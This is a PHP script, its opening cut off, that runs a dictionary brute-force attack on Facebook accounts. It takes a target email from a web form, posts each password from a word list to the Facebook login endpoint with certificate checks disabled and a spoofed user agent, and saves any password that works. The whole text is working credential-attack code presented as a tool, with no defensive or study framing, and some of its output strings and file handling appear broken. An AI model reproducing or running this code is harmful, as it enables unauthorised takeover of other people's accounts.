$value) { $data.=$key."=".urlencode($value)."&"; } return $data; } set_time_limit(0); ini_set('output_buffering',true); $dictionary =dirname(__FILE__)."/dic.txt"; // need dictionary to password list function CheckItOut($email,$pass) { $ret=false; $useragent = "Opera/9.21 (Windows NT 5.1; U; tr)"; $data = setData($email,$pass); $ch = curl_init('https://login.facebook.com/login.php?login_attempt=1'); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_ENCODING , "gzip,deflate"); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_COOKIEFILE, dirname(__FILE__).'/cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEJAR, dirname(__FILE__).'/cookie.txt'); $source=curl_exec($ch); $info=curl_getinfo($ch); if($info["redirect_count"]==1) { $ret=true; } return $ret; } echo "

Entry Email Address below to Bruteforce...
Email Address:
Click the Submit Button to Start..

"; if(isset($_POST['username'])) { $username =$_POST['username']; if(!is_file($dictionary)){echo "$dictionary is not file";exit;} $lines=file($dictionary); echo "Attack Starting..

"; sleep(3); echo "Attack Started, brute forcing..
"; foreach($lines as $line) { $line=str_replace("\r\n","",$line); if(CheckItOut($username,$line)) { echo "[+] username:$username , password: - Password found :
"; $fp=fopen('cookie.txt',''); fwrite($fp,'successfully pass:'.$line); exit; }else{ echo "[-] username:$username , password:$line - Password not found :$line
"; } /** * Print the result direct onto the browser screen... */ ob_flush(); flush(); } } ?>